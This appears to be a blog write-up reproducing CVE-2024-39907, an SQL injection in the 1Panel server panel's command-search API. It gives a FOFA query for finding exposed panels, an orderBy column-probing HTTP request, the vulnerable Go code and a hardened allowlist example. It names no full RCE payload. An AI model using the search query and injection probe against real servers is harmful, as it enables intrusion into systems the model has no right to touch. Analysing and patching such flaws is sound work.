1Panel Server Management Control Panel SQL Injection CVE-2024-39907

0x01 Product Overview

1Panel is a web-based Linux server management control panel.

0x02 Vulnerability Description

The project contains a large number of SQL injection points. Some of them are poorly filtered, which allows arbitrary file writes and ultimately leads to RCE. These SQL injections have been resolved in version 1.10.12-tls, and users are advised to upgrade. There are currently no known workarounds for these issues.

0x03 Affected Versions

v1-10-10-lts

0x04 Search Syntax

FOFA

title="1Panel"

0x05 Vulnerability Reproduction

System login page

Reproduction screenshot

POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.79.167:35839
Content-Length: 82
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Origin: http://192.168.79.167:35839
Referer: http://192.168.79.167:35839/hosts/files
Accept-Encoding: gzip, deflate, br
Cookie: psession=27116fe3-e850-41ae-b556-0d1894aa0b1d
Connection: close

{"page":1,"pageSize":10,"groupID":0,"orderBy":"12","order":"ascending","name":"a"}

By changing the number in orderBy, you can determine how many columns the table has.

Then, by concatenating a payload into orderBy, RCE can be achieved.

Key code

func (u *CommandService) SearchWithPage(search dto.SearchCommandWithPage) (int64, interface{}, error) {
	total, commands, err := commandRepo.Page(
		search.Page,
		search.PageSize,
		commandRepo.WithLikeName(search.Name),
		commonRepo.WithLikeName(search.Info),
		commonRepo.WithByGroupID(search.GroupID),
		commonRepo.WithOrderRuleBy(search.OrderBy, search.Order),
	)
	if err != nil {
		return 0, nil, err
	}
	groups, _ := groupRepo.GetList(commonRepo.WithByType("command"), commonRepo.WithOrderBy("name"))
	var dtoCommands []dto.CommandInfo
	for _, command := range commands {
		var item dto.CommandInfo
		if err := copier.Copy(&item, &command); err != nil {
			return 0, nil, errors.WithMessage(constant.ErrStructTransform, err.Error())
		}
		for _, group := range groups {
			if command.GroupID == group.ID {
				item.GroupBelong = group.Name
				item.GroupID = group.ID
			}
		}
		dtoCommands = append(dtoCommands, item)
	}
	return total, dtoCommands, err
}

Of these, the relevant function is WithOrderRuleBy:

func (c *CommonRepo) WithOrderRuleBy(orderBy, order string) DBOption {
	switch order {
	case constant.OrderDesc:
		order = "desc"
	case constant.OrderAsc:
		order = "asc"
	default:
		orderBy = "created_at"
		order = "desc"
	}
	return func(g *gorm.DB) *gorm.DB {
		// orderBy comes straight from the request body and is interpolated
		// into the ORDER BY clause without validation; "order" is normalized,
		// but "orderBy" is not.
		return g.Order(fmt.Sprintf("%s %s", orderBy, order))
	}
}
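To make the defect concrete, the following is an added example (not 1Panel's code) that places the unsafe `fmt.Sprintf` pattern from WithOrderRuleBy beside a hardened builder that only accepts allowlisted column names and directions. The strings "ascending"/"descending" stand in for constant.OrderAsc / constant.OrderDesc and match the "order" field in the request above; the column allowlist, the helper names and the "commands" table name are assumptions for illustration.

```go
package main

import (
	"errors"
	"fmt"
	"strings"
)

// Added illustration, not 1Panel's code. The "ascending"/"descending" strings
// stand in for constant.OrderAsc / constant.OrderDesc; the allowlisted column
// names and the "commands" table are assumed.

// allowedOrderColumns is the only set of identifiers a client may sort by.
var allowedOrderColumns = map[string]bool{
	"created_at": true,
	"name":       true,
	"group_id":   true,
}

// ErrBadOrder is returned when the sort column or direction is not allowlisted.
var ErrBadOrder = errors.New("invalid sort column or direction")

// VulnerableOrderClause mirrors the unsafe pattern: orderBy is interpolated
// verbatim, so whatever the client sends ends up inside the ORDER BY clause.
func VulnerableOrderClause(orderBy, order string) string {
	switch order {
	case "descending":
		order = "desc"
	case "ascending":
		order = "asc"
	default:
		orderBy = "created_at"
		order = "desc"
	}
	return fmt.Sprintf("%s %s", orderBy, order)
}

// SafeOrderClause builds the same fragment but only from allowlisted
// identifiers, so client input never reaches the SQL text unvalidated.
// An unknown direction is rejected rather than silently defaulted.
func SafeOrderClause(orderBy, order string) (string, error) {
	col := strings.ToLower(strings.TrimSpace(orderBy))
	if !allowedOrderColumns[col] {
		return "", ErrBadOrder
	}
	var dir string
	switch order {
	case "descending":
		dir = "desc"
	case "ascending":
		dir = "asc"
	default:
		return "", ErrBadOrder
	}
	return col + " " + dir, nil
}

// OrderBySQL shows where the fragment lands in the final statement.
func OrderBySQL(clause string) string {
	return "SELECT * FROM commands ORDER BY " + clause
}

func main() {
	// Constructed inputs: a legitimate sort and an ordinal column probe
	// like the "orderBy":"12" value in the request body above.
	for _, in := range [][2]string{{"name", "ascending"}, {"12", "ascending"}} {
		fmt.Println("vulnerable:", OrderBySQL(VulnerableOrderClause(in[0], in[1])))
		if c, err := SafeOrderClause(in[0], in[1]); err != nil {
			fmt.Println("hardened: rejected", in[0], "->", err)
		} else {
			fmt.Println("hardened:", OrderBySQL(c))
		}
	}
}
```

The hardened builder never passes the client's string to the database at all: it maps the input onto a fixed set of identifiers, so the only ORDER BY text that can ever be emitted is one of a handful of known clauses. Rejecting, rather than defaulting, an unrecognized value also makes the probing behaviour visible in application error logs.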


However, you must be logged in.

Exploitation conditions

  1. Requires being logged in to the admin backend

But since one is already logged in to the backend, other methods could also be tried to get a shell.

Vulnerability exploitation PoC

POST /api/v1/hosts/command/search HTTP/1.1
Host: 192.168.79.167:35839
Content-Length: 82
Accept-Language: zh
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
Origin: http://192.168.79.167:35839
Referer: http://192.168.79.167:35839/hosts/files
Accept-Encoding: gzip, deflate, br
Cookie: psession=27116fe3-e850-41ae-b556-0d1894aa0b1d
Connection: close

{"page":1,"pageSize":10,"groupID":0,"orderBy":"12","order":"ascending","name":"a"}

0x06 Remediation

Upgrade to a fixed version.

https://tsy244.github.io/2024/07/31/漏洞复现/1Panel服务器管理控制面板SQL注入CVE-2024-39907/
Author: August Rosenberg
Posted on: July 31, 2024